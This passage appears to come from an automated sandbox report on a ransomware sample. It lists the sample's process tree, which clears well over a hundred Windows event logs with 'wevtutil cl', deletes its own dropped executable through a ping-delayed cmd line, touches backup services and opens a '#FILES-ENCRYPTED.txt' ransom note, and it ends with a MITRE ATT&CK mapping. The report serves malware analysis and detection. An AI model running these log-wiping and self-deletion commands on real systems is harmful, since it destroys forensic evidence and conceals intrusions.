        wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
        5⤵
        
        PID:2020
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
        5⤵
        
        PID:792
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
        5⤵
        
        PID:1668
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
        5⤵
        
        PID:868
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
        5⤵
        
        PID:1792
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
        5⤵
        
        PID:840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
        5⤵
        
        PID:908
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
        5⤵
        
        PID:1988
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
        5⤵
        
        PID:1740
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
        5⤵
        
        PID:1836
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
        5⤵
        
        PID:792
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
        5⤵
        
        PID:908
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
        5⤵
        
        PID:1676
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
        5⤵
        
        PID:1476
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
        5⤵
        
        PID:892
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
        5⤵
        
        PID:1840
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
        5⤵
        
        PID:1676
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
        5⤵
        
        PID:1476
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
        5⤵
        
        PID:1612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
        5⤵
        
        PID:1336
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
        5⤵
        
        PID:1668
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Recovery/Operational"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReliabilityAnalysisComponent/Operational"
        5⤵
        
        PID:520
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
        5⤵
        
        PID:908
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
        5⤵
        
        PID:1616
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
        5⤵
        
        PID:328
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
        5⤵
        
        PID:1072
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
        5⤵
        
        PID:688
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
        5⤵
        
        PID:1484
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
        5⤵
        
        PID:660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
        5⤵
        
        PID:1476
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
        5⤵
        
        PID:792
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
        5⤵
        
        PID:764
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
        5⤵
        
        PID:1652
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
        5⤵
        
        PID:1216
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
        5⤵
        
        PID:1884
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
        5⤵
        
        PID:544
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
        5⤵
        
        PID:764
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
        5⤵
        
        PID:580
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
        5⤵
        
        PID:916
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
        5⤵
        
        PID:1224
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
        5⤵
        
        PID:624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
        5⤵
        
        PID:688
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
        5⤵
        
        PID:908
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
        5⤵
        
        PID:1628
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
        5⤵
        
        PID:556
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
        5⤵
        
        PID:828
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
        5⤵
        
        PID:688
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
        5⤵
        
        PID:236
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
        5⤵
        
        PID:1712
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
        5⤵
        
        PID:1116
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
        5⤵
        
        PID:792
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
        5⤵
        
        PID:1192
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
        5⤵
        
        PID:1992
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
        5⤵
        
        PID:1472
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
        5⤵
        
        PID:1668
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
        5⤵
        
        PID:544
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
        5⤵
        
        PID:204
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
        5⤵
        
        PID:1692
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
        5⤵
        
        PID:428
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
        5⤵
        
        PID:316
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
        5⤵
        
        PID:576
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
        5⤵
        
        PID:1476
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
        5⤵
        
        PID:1112
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
        5⤵
        
        PID:1660
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
        5⤵
        
        PID:1980
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
        5⤵
        
        PID:1488
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
        5⤵
        
        PID:768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
        5⤵
        
        PID:228
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
        5⤵
        
        PID:560
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
        5⤵
        
        PID:960
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
        5⤵
        
        PID:1492
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
        5⤵
        
        PID:1624
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Admin"
        5⤵
        
        PID:560
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Windows\BackupXXXA8C4AD38.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Windows\BackupXXXA8C4AD38.exe"
      4⤵
      PID:1472
    - - C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 100
        5⤵
        Runs ping.exe
        
        PID:328
    - - C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 900
        5⤵
        Runs ping.exe
        
        PID:2032

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:1192

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:1612

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:1072

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\#FILES-ENCRYPTED.txt
1⤵
PID:520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Change Default File Association

T1042

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Indicator Removal on Host

T1070

Modify Registry

Credential Access

Credentials in Files

T1081

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery